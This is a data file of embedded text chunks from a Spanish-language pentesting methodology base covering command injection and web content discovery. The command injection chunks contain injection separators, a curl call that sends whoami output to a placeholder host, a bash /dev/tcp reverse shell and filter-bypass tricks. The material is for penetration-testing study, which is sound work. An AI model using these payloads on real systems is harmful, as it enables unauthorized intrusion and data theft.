"conocimiento/02 - Explotacion web/Command injection.md", "texto": "## Separadores a probar (en Burp Repeater e Intruder)\n```\n;id ejecuta tras el comando\n| id pipe\n& id / && id encadenado\n`id` $(id) sustitución de comando\n%0a id newline (a veces evade filtros)\n```\nEjemplo: `?host=127.0.0.1;id` → si ves `uid=...` en la respuesta, tienes RCE.", "v": [-0.11015, -0.0618, -0.15038, 0.02847, 0.23187, -0.07148, 0.04065, 0.01433, -0.03831, -0.07918, -0.19195, -0.16106, -0.03174, -0.16137, -0.07335, 0.00249, 0.03578, 0.04185, 0.03802, -0.00868, 0.0526, 0.08128, -0.02886, 0.00603, 0.06682, 0.18626, -0.05154, 0.06874, -0.16063, -0.05876, -0.02055, 0.02456, 0.00765, -0.09522, -0.12469, -0.01602, -0.05915, 0.06527, -0.18204, 0.1566, -0.0607, 0.0076, -0.10652, 0.01996, -0.02385, -0.07501, -0.04174, 0.08583, 0.11256, 0.0633, -0.09652, -0.03708, -0.0664, 0.00779, 0.00202, -0.01175, 0.12031, 0.01477, -0.10987, 0.0438, 0.02833, 0.04945, 0.08653, 0.04067, -0.0498, 0.06984, -0.02565, -0.11925, 0.04897, 0.03166, -0.0424, 0.01739, -0.18543, -0.02058, -0.02393, -0.05766, 0.06202, -0.00571, 0.07466, 0.07813, -0.0939, -0.0325, -0.06009, 0.03043, -0.01149, 0.01442, 0.01464, -0.08895, -0.01665, -0.00438, 0.01517, -0.07081, 0.09934, 0.05337, 0.00791, -0.12254, 0.00687, 0.06546, 0.07549, -0.02731, 0.0435, 0.0161, -0.04447, 0.11217, 0.05918, 0.04943, -0.02492, 0.02627, -0.04223, 0.00452, 0.06703, -0.11251, 0.02241, -0.0092, -0.08862, -0.00511, -0.10656, -0.08462, 0.03847, -0.08812, -0.07554, -0.01137, 0.02564, -0.01228, 0.0438, -0.0432, -0.0472, 0.01788, 0.08466, 0.0412, 0.00537, 0.04068, 0.01404, -0.08879, -0.04638, 0.0808, 0.02443, 0.04772, -0.01442, -0.02364, -0.01397, 0.0744, 0.02216, 0.04253, 0.02928, 0.03605, 0.07783, -0.18152, -0.04537, 0.03141, 0.02371, 0.07618, -0.01529, 0.06755, -0.01203, -0.00116, -0.04613, -0.074, -0.01565, 0.01023, 0.01414, 0.00661, 0.00607, 0.09557, 0.0406, -0.03602, -0.0594, -0.06742, 0.01875, -0.0342, -0.00675, 0.00612, -0.09887, -0.03434, 0.02089, -0.04621, 0.04152, -0.07499, -0.03273, -0.04611, 0.02893, 0.02507, -0.00914, 0.0037, -0.01196, -0.03675, -0.01291, -0.0459, -0.03767, -0.01194, 0.01265, -0.02117, -0.06239, -0.03603, 0.01792, 0.02663, 0.02468, -0.00419, -0.01427, 0.02567, -0.05983, 0.02376, 0.01235, -0.05507, 0.00182, -0.02716, -0.02885, 0.05158, -0.03443, -0.02291, 0.00029, -0.01316, 0.04899, 0.00367, -0.06844, -0.05526, 0.02113, 0.02681, 0.01209, 0.00761, 0.00363, 0.04861, 0.03233, -0.01345, 0.00819, 0.08298, 0.01624, -0.04562, 0.07806, 0.03117, -0.06666, 0.00719, 0.02087, -0.04263, 0.05802, -0.00372, 0.00174, -0.00149, -0.06109, -0.06671, 0.03334, 0.03526, -0.01835, -0.09437, -0.037, -0.08147, -0.08452, 0.05436, 0.05852, -0.04608, -0.05677, -0.00497, -0.03567, -0.03367, 0.04221, -0.0171]} +{"tipo": "metodologia", "herramienta": "Command injection", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "texto": "# out-of-band:\n?host=127.0.0.1; curl http://TU_IP/$(whoami) # míralo en tu http.server\n```", "v": [0.03179, -0.11779, -0.11981, 0.07727, -0.05869, -0.22528, -0.09265, 0.03261, 0.07401, 0.05538, -0.04718, -0.08182, 0.02006, 0.00207, -0.12447, -0.05856, -0.07898, 0.02633, 0.10004, 0.00636, 0.02345, 0.14697, -0.13397, -0.00929, -0.0478, 0.0893, -0.09589, 0.06018, -0.04463, -0.14529, 0.01967, -0.18557, -0.05624, -0.08872, -0.05318, -0.1241, 0.02435, 0.15751, -0.03289, 0.17691, -0.07851, -0.02622, 0.03418, 0.01512, 0.01678, -0.01444, 0.04234, -0.05217, 0.09102, -0.03578, -0.05831, -0.03052, -0.0235, -0.00072, 0.03711, 0.01278, -0.02091, -0.09759, -0.05267, -0.07, 0.00552, 0.11124, -0.12952, -0.04239, 0.02774, -0.00324, -0.10572, 0.02236, -0.06173, -0.03462, 0.00622, -0.06047, -0.04706, -0.00062, 0.09896, 0.01149, 0.12688, -0.05478, 0.06502, 0.07411, -0.12572, 0.05206, 0.05222, 0.0062, -0.05463, -0.03926, 0.10307, -0.1147, -0.01489, 0.03453, 0.05535, 0.10895, -0.05256, 0.01922, 0.00087, -0.10647, 0.03179, 0.08327, 0.08473, -0.02975, 0.08274, 0.10596, -0.09861, 0.02221, 0.14969, 0.03318, 6e-05, -0.00631, -0.05116, 0.08516, 0.03853, 0.01831, -0.04088, 0.0461, -0.03153, -0.05285, -0.05936, 0.04785, 0.05405, -0.02946, -0.02703, -0.00596, 0.03595, -0.04452, -0.03188, -0.02302, 0.02442, 0.10018, 0.02146, -0.04748, 0.01212, -0.01732, -0.01473, -0.04118, 0.02691, 0.04475, 0.01899, -0.01588, 0.0548, 0.09261, 0.01779, 0.04237, -0.0461, 0.00336, 0.12226, 0.00298, 0.04306, -0.11984, -0.09899, 0.02003, 0.01402, 0.14686, -0.04932, -0.00946, -0.06433, -0.00847, 0.05262, -0.11175, -0.02321, -0.02386, 0.06572, 0.04291, 0.11325, 0.05138, -0.0196, 0.02339, -0.02504, 0.04664, 0.04702, -0.05912, -0.03305, 0.00799, -0.08417, 0.03608, 0.00919, -0.04617, 0.03477, -0.12635, -0.05261, -0.02692, 0.07308, -0.05916, -0.04534, 0.03187, 0.0432, 0.02728, 0.06938, -0.04054, -0.00412, -0.00763, 0.02624, -0.02903, 0.00977, 0.06746, 0.05637, -0.02784, -0.01071, -0.09851, -0.01272, -0.00824, -0.09396, -0.04599, -0.00507, 0.0278, -0.01081, -0.07668, -0.02267, -0.0114, -0.01662, 0.03584, 0.06175, -0.01321, -0.01957, -0.02062, -0.04899, 0.05919, -0.01343, 0.03675, 0.03133, 0.03949, -0.01774, 0.05509, 0.01766, 0.03273, -0.00249, 0.06011, 0.05692, -0.01858, 0.04247, 0.00247, -0.02022, 0.03408, 0.0097, -0.06751, -0.01225, -0.03432, -0.00474, -7e-05, -0.08877, -0.04157, -0.02335, 0.01799, -0.01398, -0.06241, -0.01643, -0.06823, -0.04254, 0.00095, -0.02477, -0.02096, -0.03937, -0.08163, 0.01419, -0.03833, 0.02059, 0.04155]} +{"tipo": "metodologia", "herramienta": "Command injection", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "texto": "## De RCE a shell\n```\n?host=127.0.0.1; bash -c 'bash -i >& /dev/tcp/TU_IP/4444 0>&1'\n```\n→ recíbela en tu listener (Reverse shell, ojo al Egress filtering).", "v": [0.04593, -0.12731, -0.07002, -0.00934, 0.09153, -0.13851, -0.09997, -0.0084, 0.15831, 0.08369, -0.12048, -0.05786, -0.05925, -0.08018, 0.04769, -0.02559, -0.1337, 0.07389, 0.02016, -0.10917, 0.02321, 0.1041, -0.1425, 0.01895, 0.0555, 0.1513, -0.11445, 0.05624, -0.04366, -0.08432, 0.02402, -0.17749, -0.03819, -0.01153, -0.06891, 0.03242, -0.04808, 0.01378, -0.07106, 0.19631, -0.05217, 0.004, -0.15641, 0.14498, 0.09657, -0.12238, 0.09527, -0.02296, 0.07223, -0.01998, -0.10322, -0.06078, -0.1716, 0.03331, 0.02934, 0.04235, 0.10031, -0.00612, -0.01614, -0.10373, -0.06474, 0.10133, -0.0259, -0.07204, 0.08552, -0.01283, -0.02101, -0.0998, -0.11028, -0.01099, -0.01553, 0.06488, -0.02679, -0.00042, 0.10226, -0.01166, 0.05068, -0.04374, 0.04112, 0.02517, -0.14577, -0.05655, 0.01398, 0.01336, -0.04022, 0.01179, 0.06346, -0.08924, -0.08643, 0.07975, -0.01239, 0.03998, -0.01729, 0.02275, 0.05824, -0.12846, 0.04667, 0.06001, -0.06803, -0.03262, 0.02641, 0.06142, -0.06363, 0.13039, 0.11454, -0.02516, 0.01702, -0.05929, 0.02495, 0.05934, 0.05701, -0.03607, 0.03765, -0.07543, 0.01871, -0.04363, -0.09993, 0.0273, 0.07888, 0.00226, 0.00149, -0.02582, -0.01265, -0.02402, 0.03442, 0.02945, -0.01103, 0.06438, 0.0117, -0.06983, 0.01531, 0.04085, 0.02113, 0.00833, -0.00754, 0.0973, -0.01247, -0.024, 0.03379, 0.027, -0.00204, 0.0408, -0.03838, 0.06758, 0.14335, -0.02474, 0.03904, -0.11401, -0.10011, -0.01495, 0.08977, 0.07937, -0.02732, 0.03656, -0.00734, -0.02649, 0.05194, -0.08561, 0.01426, -0.01598, 0.06696, 0.05834, 0.01136, 0.08155, -0.01355, 0.01292, -0.01248, -0.00155, 0.05016, -0.00817, -0.03091, -0.03011, -0.00937, -0.03149, -0.07793, -0.0596, 0.01471, -0.05607, -0.02908, -0.02536, 0.05866, -0.03593, 0.0078, -0.02955, 0.02396, 0.06191, 0.01554, -0.0184, 0.00865, -0.0155, 0.05509, -0.02446, -0.07624, 0.01794, 0.01587, 0.00217, -0.00398, -0.10845, -0.04626, 0.02005, -0.07925, 0.06451, 0.02091, -0.08303, 0.00848, -0.04728, -0.02136, -0.03671, 0.02485, -0.02838, -0.00211, -0.00305, -0.01208, 0.0399, -0.06982, -0.00453, 0.00953, 0.04783, 0.05715, 0.01354, -0.03759, 0.02612, 0.00684, 0.05123, 0.00016, 0.01994, 0.07536, -0.08273, 0.03242, -0.0305, 0.00551, 0.01853, -0.00422, -0.07106, -0.0442, -0.06448, -0.03546, 0.00225, -0.01307, -0.04123, 0.01787, -0.00013, 0.00787, -0.03604, 0.01055, -0.05545, -0.02657, 0.03173, 0.00383, -0.00572, -0.08648, -0.08846, -0.0034, -0.08013, -0.00096, -0.01622]} +{"tipo": "metodologia", "herramienta": "Command injection", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "texto": "## Bypass de filtros\n- Espacios filtrados → `${IFS}`, `$IFS$9`, `<`.\n- Palabras filtradas → `w''hoami`, `wh\\oami`, variables.\n\nRelacionado: Directory traversal · Reverse shell · OSCP MOC", "v": [-0.05133, -0.13922, 0.03372, -0.07853, 0.03838, -0.24273, 0.07973, -0.18195, -0.09455, -0.00235, 0.05784, -0.07566, 0.00764, -0.08517, 0.05624, 0.03372, -0.01266, 0.01386, -0.08419, -0.05829, -0.03076, -0.09905, -0.23544, -0.08291, -0.08517, 0.07271, -0.13942, -0.04149, -0.17507, -0.13613, 0.14332, 0.00644, 0.01098, -0.02635, -0.08473, -0.05728, -0.14067, -0.00698, 0.10853, 0.09294, 0.05666, 0.06712, -0.09721, 0.12978, 0.0809, -0.12421, -0.01182, -0.01413, 0.05883, 0.03501, 0.03074, -0.13163, -0.0717, 0.06676, 0.00492, 0.01832, 0.09596, -0.01414, -0.09171, 0.01968, 0.04131, 0.0288, 0.10117, 0.03549, 0.03178, -0.12405, -0.00173, -0.09364, 0.00363, 0.08909, -0.05756, -0.0117, -0.0303, -0.02005, 0.05362, 0.03319, 0.15794, -0.066, 0.10646, 0.08243, -0.09182, -0.10843, 0.02772, 0.04073, -0.04083, -0.0515, 0.06831, -0.01058, 0.00114, -0.0636, -0.02883, -0.05113, -0.07273, -0.01447, -0.02218, -0.04531, -0.04347, 0.0895, -2e-05, 0.04849, 0.0078, -0.01704, 0.00717, 0.10968, 0.02264, 0.06695, 0.01142, 0.03174, -0.01866, -0.03095, 0.10352, -0.02105, 0.08706, -0.09167, -0.01262, 0.07671, 0.02492, -0.03556, 0.08102, 0.0207, 0.02548, -0.06379, -0.07079, -0.07661, 0.06713, 0.0151, -0.03567, 0.00385, -0.00044, 0.04616, -0.0485, 0.10995, -0.06638, -0.01, -0.04175, -0.01511, 0.03114, -0.00518, 0.09422, -0.099, -0.02009, 0.02861, 0.02826, 0.11004, 0.07741, 0.04971, 0.04411, -0.06272, -0.05111, -0.00272, 0.04888, -0.01253, -0.0118, -0.00442, 0.02016, -0.00683, 0.01559, -0.02094, -0.13855, -0.02128, 0.05902, 0.09061, 0.04447, 0.02407, 0.00823, 0.01067, -0.02551, -0.01859, 0.03049, -0.08624, 0.01551, 0.01004, -0.02799, 0.03146, -0.00892, -0.01777, 0.07173, -0.00251, -0.04383, 0.0074, 0.05621, 0.04367, -0.03549, -0.023, -0.04456, -0.00548, 0.00256, 0.00968, -0.03123, -0.03202, 0.03166, -0.00633, -0.00439, -0.0256, 0.03467, 7e-05, 0.02195, -0.0451, 0.02769, 0.01672, 0.00943, 0.02342, 0.04569, -0.05723, 0.02773, -0.03825, 0.03622, 0.0548, 0.03902, -0.03117, 0.00083, -0.02202, -0.02673, -0.05542, -0.02649, 0.03613, 0.05842, 0.04127, 0.01494, 0.0389, -0.04203, 0.06277, 0.04058, 0.03995, 0.04797, -0.03837, -0.02664, -0.05756, 0.01571, -0.00289, -0.05071, -0.03566, -0.00895, -0.04003, 0.02562, 0.04257, -0.05005, -0.01101, -0.0741, -0.02905, 0.02211, 0.0297, 0.0607, -0.06118, -0.0149, -0.0836, -0.05319, -0.01202, 0.04581, 0.01041, -0.03599, -0.0245, -0.04439, -0.1044, 0.03922, 0.02556]} +{"tipo": "metodologia", "herramienta": "Content discovery", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "texto": "# Content discovery\n\n> Descubrir rutas, ficheros y endpoints ocultos por fuerza bruta. El paso que más vectores destapa en Hacking web. Complementa Enumeración web.", "v": [0.16475, -0.16178, -0.13825, -0.12817, 0.15291, 0.00574, 0.04361, 0.00637, 0.04442, -0.16994, -0.13213, -0.068, -0.16721, 0.0661, 0.0811, 0.02379, 0.02854, -0.17695, 0.00556, -0.1083, -0.05642, -0.06651, -0.05601, -0.04114, 0.00393, -0.09457, -0.07698, 0.17084, -0.02156, 0.02203, 0.09349, 0.15002, 0.07636, 0.04233, -0.11125, 0.05005, 0.01405, -0.05978, 0.10017, -0.0146, 0.00355, 0.16865, -0.10512, -0.02179, -0.08993, -0.02285, -0.07432, -0.03591, 0.01592, -0.00162, -0.01954, -0.02722, -0.21628, -0.04821, -0.00973, -0.08065, 0.10443, 0.03213, 0.02227, 0.05621, -0.03572, 0.0471, -0.06373, -0.03174, -0.06187, -0.12533, -0.01129, 0.00535, 0.00883, 0.04626, -0.02986, 0.02933, 0.11865, -0.0487, 0.04301, 0.01522, 0.03912, -0.00448, 0.00889, 0.11203, -0.00029, -0.04418, -0.07791, 0.02048, -0.05853, -0.08503, 0.06975, -0.02131, -0.03142, -0.11016, 0.07538, 0.08777, -0.01757, 0.02981, -0.08084, -0.03783, 0.03487, -0.0622, 0.03301, -0.09977, -0.07543, -0.00502, -0.12832, -0.02222, 0.05348, 0.04417, -0.00784, 0.00115, -0.01213, 0.01073, 0.06419, -0.04642, -0.02798, -0.03589, 0.01701, 0.01436, 0.00733, 0.02963, 0.01561, -0.13876, -0.11853, -0.05205, -0.08567, 0.1058, -0.03044, -0.00763, -0.04466, 0.03835, 0.05728, -0.07563, 0.03504, -0.01437, -0.09086, -0.06442, -0.06774, -0.00613, 0.00731, 0.00024, -0.01446, -0.02755, 0.03092, -0.08512, -0.06957, 0.002, 0.04746, -0.03979, 0.07388, -0.0216, -0.07899, -0.02643, 0.0103, 0.0162, -0.02756, 0.0271, -0.02448, 0.03306, -0.03343, -0.07946, -0.08924, 0.00605, -0.01489, 0.09274, -0.09842, -0.02234, 0.00156, 0.01109, -0.08875, 0.01114, -0.01926, -0.03174, -0.0169, -0.02072, 0.04242, -0.08592, 0.04231, -0.04645, -0.09418, -0.00037, 0.05577, 0.01602, 0.00271, -0.02, 0.09268, 0.00971, -0.07191, -0.03041, 0.06957, -0.00266, 0.0114, -0.0032, 0.00546, -0.03128, -0.05708, 0.05473, -0.01419, -0.04569, -0.02189, 0.06186, 0.0683, -0.00082, 0.0185, -0.01257, -0.01858, -0.05589, -0.04774, 0.00055, -0.01928, -0.08667, 0.0083, -0.01044, 0.04433, -0.03465, 0.06521, -0.05519, 0.0015, -0.05357, 0.00197, 0.00764, -0.05026, 0.01203, 0.00945, 0.07186, -0.00863, -0.02836, 0.06517, 0.028, 0.05727, -0.02351, -0.0144, 0.05232, -0.01872, -0.07249, -0.01625, -0.041, 0.01347, -0.01517, -0.03236, 0.02531, -0.0449, 0.03125, -0.01121, 0.02652, 0.06485, -0.04928, -0.03145, -0.06494, -0.06754, -0.03195, -0.00258, -0.01745, -0.0454, 0.00077, 0.03688, -0.04145, -0.01237, -0.05369]} +{"tipo": "metodologia", "herramienta": "Content discovery", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "texto": "# gobuster (rápido, directo)\ngobuster dir -u http://IP -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,txt,html", "v": [0.14068, -0.10927, -0.14477, -0.09853, 0.10132, -0.18258, -0.1074, -0.02964, 0.14912, 0.10228, -0.08752, -0.1341, -0.05356, -0.04437, -0.02472, -0.02232, 0.00492, 0.03819, 0.03349, -0.14648, 0.09504, 0.04688, -0.13635, -0.03798, 0.01305, -0.04424, -0.11914, 0.0589, -0.10078, -0.00209, 0.02759, -0.01916, -0.04867, 0.01612, -0.16204, -0.04895, 0.08519, 0.08222, -0.08836, 0.13649, 0.05354, 0.0891, -0.1475, 0.13489, -0.01874, -0.05909, -0.03155, -0.12838, 0.03423, -0.07674, 0.00418, -0.02974, -0.0376, -0.01276, -0.14076, -0.05157, 0.01961, -0.13634, 0.05396, -0.00163, -0.02765, 0.07093, -0.11355, -0.17699, 0.02334, 0.05431, 0.02125, 0.05496, -0.10531, 0.03478, -0.05944, 0.01612, 0.09352, 0.06169, 0.07709, 0.00309, 0.02438, -0.03022, 0.09039, 0.06224, -0.04245, -0.01465, 0.00664, -0.00637, 0.01862, -0.07489, 0.0463, -0.15731, -0.00956, -0.0561, 0.07433, -0.03638, -0.05945, 0.13276, 0.01733, -0.12505, 0.05172, 0.00793, 0.00154, -0.06162, -0.01557, 0.07356, -0.0893, -0.07248, 0.09817, 0.02221, 0.02958, 0.03833, -0.05245, 0.00905, 0.15791, 0.00429, 0.02225, -0.0643, -0.01635, -0.0614, -0.08143, 0.00223, -0.08092, -0.08376, -0.10602, -0.06908, -0.05111, 0.05355, 0.00318, 0.0043, 0.06274, 0.07824, -0.08478, -0.09321, 0.07843, -0.02549, -0.05071, -0.05649, -0.00657, 0.07963, -0.02968, 0.07361, 0.053, 0.02808, -0.00577, -0.01104, -0.06495, 0.07738, 0.00454, -0.00616, 0.07063, -0.04079, -0.0319, 0.04426, -0.01886, 0.0459, -0.01428, -0.00762, 0.02222, -0.04216, 0.02189, -0.01563, -0.02793, -0.03821, 0.01192, -0.00916, -0.02325, -0.00304, -0.02319, 0.01909, -0.04639, 0.05209, 0.01438, -0.0571, -0.03113, 0.03394, 0.05327, -0.11231, -0.04259, -0.01369, 0.05413, -0.01567, 0.01811, -0.08025, 0.01087, -0.05493, 0.0085, 0.01108, -0.04033, -0.05048, 0.05815, 0.01382, -0.05541, -0.00913, -0.00975, 0.03597, -0.03442, 0.06162, 0.03058, -0.02316, -0.0751, -0.01823, -0.02703, -0.02329, -0.07946, -0.02825, 0.0111, -0.03856, 0.00872, -0.06829, 0.00279, 0.01528, -0.07742, -0.04789, -0.00769, 0.0553, 0.02829, -0.03706, -0.02957, -0.03405, 0.01604, 0.04367, 0.02888, -0.00509, -0.01138, 0.03189, 0.02199, -0.03285, 0.02246, 0.00788, 0.02375, -0.00914, 0.03465, 0.02407, -0.05405, -0.0076, -0.02734, -0.05469, 0.05946, -0.00985, -0.06187, 0.03878, 0.0117, -0.03271, 0.00193, 0.04208, 0.00773, 0.02072, -0.01673, -0.04263, -0.0729, 0.00684, -5e-05, 0.03003, -0.0427, -0.03078, -0.04284, -0.07353, -0.03526, -0.03757]} +{"tipo": "metodologia", "herramienta": "Content discovery", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "texto": "# feroxbuster (RECURSIVO automático, el favorito para OSCP)\nferoxbuster -u http://IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,txt,bak", "v": [0.06566, -0.24418, -0.19208, -0.10902, 0.08453, -0.17481, -0.06292, -0.02197, 0.09071, 0.0397, -0.04464, -0.17144, -0.00126, -0.01412, 0.02422, 0.05719, -0.00622, 0.06646, -0.00947, -0.06712, 0.11203, 0.02456, -0.16209, 0.00323, 0.0801, 0.05201, -0.12926, -0.00091, -0.11683, -0.03865, 0.08089, 0.03302, -0.02445, -0.0102, -0.15186, -0.06079, 0.03032, 0.03328, -0.05648, 0.13305, 0.06569, 0.12671, -0.14838, 0.16017, 0.06657, -0.04738, -0.03588, -0.05198, 0.01521, -0.09125, 0.01591, -0.16392, -0.08553, 0.03728, -0.16603, -0.04707, 0.0084, -0.07786, 0.04917, -0.01665, -0.01107, 0.06996, -0.13503, -0.15946, 0.05031, 0.0086, -0.07045, 0.03996, -0.06427, 0.03325, -0.03927, 0.06021, 0.03329, -0.0103, 0.08943, 0.01671, 0.04655, -0.02811, 0.12084, 0.05356, -0.09762, -0.04117, 0.02281, -0.00395, 0.02394, -0.07391, 0.07531, -0.14261, -0.04924, -0.08865, 0.07216, -0.01255, -0.02428, 0.07255, 0.08414, -0.13037, 0.04892, 0.0495, -0.02135, -0.01967, 0.02944, 0.09129, -0.07149, -0.05142, 0.04734, -0.0164, 0.06677, 0.03989, -0.05479, -0.00023, 0.15887, 0.03021, 0.04227, -0.0723, -0.01964, -0.06165, -0.05355, 0.05034, -0.05425, -0.06142, -0.10996, -0.04475, -0.03928, 0.02572, 0.00788, -0.01911, 0.046, 0.08886, -0.03289, -0.12505, 0.08404, -0.03232, -0.07344, -0.05525, -0.0308, 0.06132, -0.03338, 0.06181, 0.01655, 0.00972, 0.02388, 0.01214, -0.05851, 0.06185, 0.00606, 0.00708, 0.0489, -0.02412, -0.02432, 0.00148, -0.03912, 0.00159, 0.01614, -0.02089, 0.00199, -0.0195, -0.00628, -0.00081, -0.00823, -0.03195, -0.00383, -0.00817, -0.03072, 0.0052, -0.00763, 0.06466, -0.0489, 0.02562, -0.00952, -0.06163, -0.03665, 0.0109, 0.05009, -0.09145, -0.05816, -0.09249, 0.04184, -0.04094, 0.03574, -0.0446, -0.01091, -0.04804, 0.0055, 0.023, -0.00255, -0.06387, 0.03879, 0.00936, -0.0182, -0.04265, -0.0292, -0.00035, -0.05215, 0.03221, 0.03336, -0.03932, -0.04733, -0.01489, -0.01474, -0.02256, -0.09065, -0.01873, 0.01165, -0.05722, 0.02635, -0.04362, -0.00379, 0.01387, -0.07306, 0.00885, 0.00949, 0.03683, 0.02211, -0.0193, -0.01399, -0.00388, 0.02128, 0.04977, 0.02142, 0.00504, 0.00321, 0.01468, 0.02149, -0.03289, -0.00053, -0.02193, 0.01614, -0.00021, 0.04507, 0.00389, -0.04785, -0.00667, -0.03344, -0.02193, 0.0747, 0.02408, -0.05267, 0.02734, 0.01114, -0.02509, 0.01781, 0.02927, -0.0024, 0.01403, 0.01041, -0.04698, -0.05704, 0.00526, -0.00103, 0.04074, -0.01326, -0.03044, -0.07209, -0.09144, -0.0161, -0.03221]} +{"tipo": "metodologia", "herramienta": "Content discovery", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "texto": "# ffuf (el más flexible: filtros, vhosts, params)\nffuf -u http://IP/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .php,.txt\n```", "v": [0.17651, -0.12619, -0.11996, -0.07962, 0.0987, -0.14271, -0.10668, -0.0831, 0.10028, 0.06577, -0.08788, -0.08429, -0.07817, -0.05866, -0.04329, -0.05533, 0.07163, -0.09053, -0.03139, -0.10787, 0.0615, 0.0768, -0.18422, -0.11791, -0.07786, -0.00512, -0.12092, -0.05992, -0.12384, -0.10929, 0.22547, -0.03055, -0.03457, 0.01148, -0.09512, -0.00579, 0.0409, 0.05912, -0.01649, 0.13035, 0.05042, 0.10067, -0.12211, 0.16512, -0.06778, -0.0663, -0.09186, -0.08999, 0.07661, -0.04667, 0.0058, -0.0869, -0.03514, 0.11438, -0.08087, -0.10149, 0.04743, -0.11734, -0.01516, 0.01661, -0.05202, -0.02227, -0.04156, -0.10597, 0.01281, -0.00485, -4e-05, 0.0264, -0.14233, 0.04797, -0.04742, 0.0096, 0.04717, -0.08054, 0.05107, 0.05549, 0.03665, -0.05432, 0.08036, 0.0427, -0.05961, -0.0339, -0.03452, -0.04813, -0.01043, -0.09336, 0.08098, -0.11543, -0.09547, -0.08381, 0.10267, 0.02253, -0.0788, 0.08042, 0.01849, -0.07046, 0.06395, 0.05267, 0.07618, -0.0244, 0.01442, 0.05338, -0.03963, 0.05282, 0.11054, 0.02679, 0.05887, 0.03631, -0.03427, 0.02849, 0.12561, -0.0041, 0.03904, -0.06796, -0.04793, -0.08125, -0.05197, 0.01522, 0.02932, -0.06365, -0.04695, -0.08225, -0.05359, 0.04826, -0.00907, 0.04036, 0.03835, 0.06419, -0.03574, -0.05891, 0.04758, 0.00414, -0.04934, -0.02396, -0.04432, 0.05956, 0.03209, 0.07047, 0.0056, 0.00738, 0.01229, -0.00801, -0.02169, 0.12362, 0.06841, -0.03462, 0.05365, -0.02979, -0.05221, 0.05561, -0.03116, 0.05604, -0.00219, -0.05358, -0.00264, 0.01495, 0.04995, -0.0304, -0.03675, -0.02503, 0.02466, 0.04681, 0.00516, 0.01801, 0.00318, 0.0449, -0.01129, -0.01634, 0.00223, -0.09768, -0.00909, 0.06399, -0.01895, -0.13269, -0.0299, -0.06718, 0.02618, -0.03479, 0.03222, 0.02973, 0.06041, -0.03076, 0.0029, 0.05505, -0.01522, -0.06144, 0.00802, 0.00208, -0.01881, 0.00883, 0.00054, 0.01352, -0.04946, 0.04144, 0.01247, -0.02928, -0.0548, -0.06486, -0.03921, -0.04377, -0.06395, 0.03413, -0.03277, -0.04353, -0.02298, -0.05468, 0.00867, 0.01327, -0.03272, -0.09281, 0.00449, -0.03529, 0.03391, -0.00824, -0.03042, -0.0068, 0.00797, 0.04627, 0.02556, 0.01489, 0.01988, 0.04393, 0.00872, -0.04187, 0.00445, -0.01643, 0.05823, 0.01707, 0.0327, 0.01613, -0.06903, 0.0484, -0.00409, -0.02365, 0.03861, -0.02017, -0.00694, 0.01422, -0.02675, -0.03901, -0.0137, 0.03384, 0.01397, 0.00751, -0.02877, -0.05627, -0.08333, -0.00492, 0.00013, -0.03824, -0.07885, -0.05232, -0.04986, -0.09031, 0.01199, -0.03732]} +{"tipo": "metodologia", "herramienta": "Content discovery", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "texto": "## Lo que importa\n- **Extensiones** (`-x` / `-e`): prueba según la tecnología → `php`, `asp`, `aspx`, `txt`, `bak`, `zip`, `old`.\n- **Recursión**: feroxbuster baja solo a las carpetas que encuentra (gobuster no).\n- **Wordlists**: `raft-large-words`, `directory-list-2.3-medium`. `common.txt` es nivel junior (Trampas de enumeración).\n- **Filtrar ruido** en ffuf: `-fc 404` (código), `-fs 1234` (tamaño), `-mc 200,301,302`.", "v": [0.10891, -0.06956, 0.01779, -0.03968, 0.00094, -0.21117, -0.03039, 0.02466, 0.05348, 0.09373, -0.11609, -0.15952, -0.01962, 0.01097, 0.03674, -0.06944, -0.04058, -0.02327, -0.00384, 0.03673, 0.10652, -0.01631, -0.13033, -0.07614, -0.01049, 0.0796, -0.06977, 0.03977, -0.16479, 0.00319, 0.16914, -0.01315, -0.01791, -0.00618, -0.09962, 0.04333, 0.10248, 0.01179, -0.09897, 0.24699, 0.04597, 0.11035, -0.11815, 0.09788, -0.00037, -0.09368, 0.003, 0.03904, 0.0085, -0.02982, -0.01988, -0.06836, 0.05399, 0.00598, -0.02291, -0.1178, 0.06885, 0.05114, -0.01459, -0.00641, 0.08495, 0.00868, -0.11564, -0.08702, 0.0392, -0.00654, 0.16082, -0.07806, -0.0332, 0.03937, -0.10069, -0.01928, -0.0741, -0.13596, 0.06677, 0.00965, 0.09587, -0.08275, 0.1051, 0.02928, -0.0612, -0.10238, -0.07558, -0.06739, 0.03004, -0.06652, 0.09693, -0.07767, -0.03607, -0.04108, 0.16778, 0.0094, -0.04528, -0.00089, 0.02986, -0.11898, 0.05406, 0.11692, 0.02494, 0.00965, 0.02763, 0.02935, -0.0229, 0.0333, 0.08974, 0.0216, 0.047, 0.03549, 0.00767, -0.07077, 0.13378, -0.00283, 0.08667, -0.04756, -0.0666, -0.06665, -0.04165, -0.00368, -0.01803, -0.01862, -0.03325, -0.03753, -0.06418, 0.13409, -0.03383, -0.06948, -0.03712, -0.00925, -0.04114, -0.03651, 0.03324, 0.05213, -0.03145, -0.03608, -0.05598, 0.01827, -0.00553, -0.00427, 0.08704, 0.06309, 0.04848, 0.04712, -0.00963, 0.04798, 0.01081, 0.06011, 0.10985, -0.01192, -0.04107, 0.04589, 0.05163, 0.07894, 0.01152, 0.06489, 0.08321, -0.02139, 0.03436, -0.00623, 0.01121, -0.03345, 0.00472, 0.06191, 0.07056, 0.03084, 0.00665, -0.01296, -0.02064, -0.08702, 0.01584, -0.08689, -0.066, -0.05559, -0.02242, -0.05455, -0.07696, 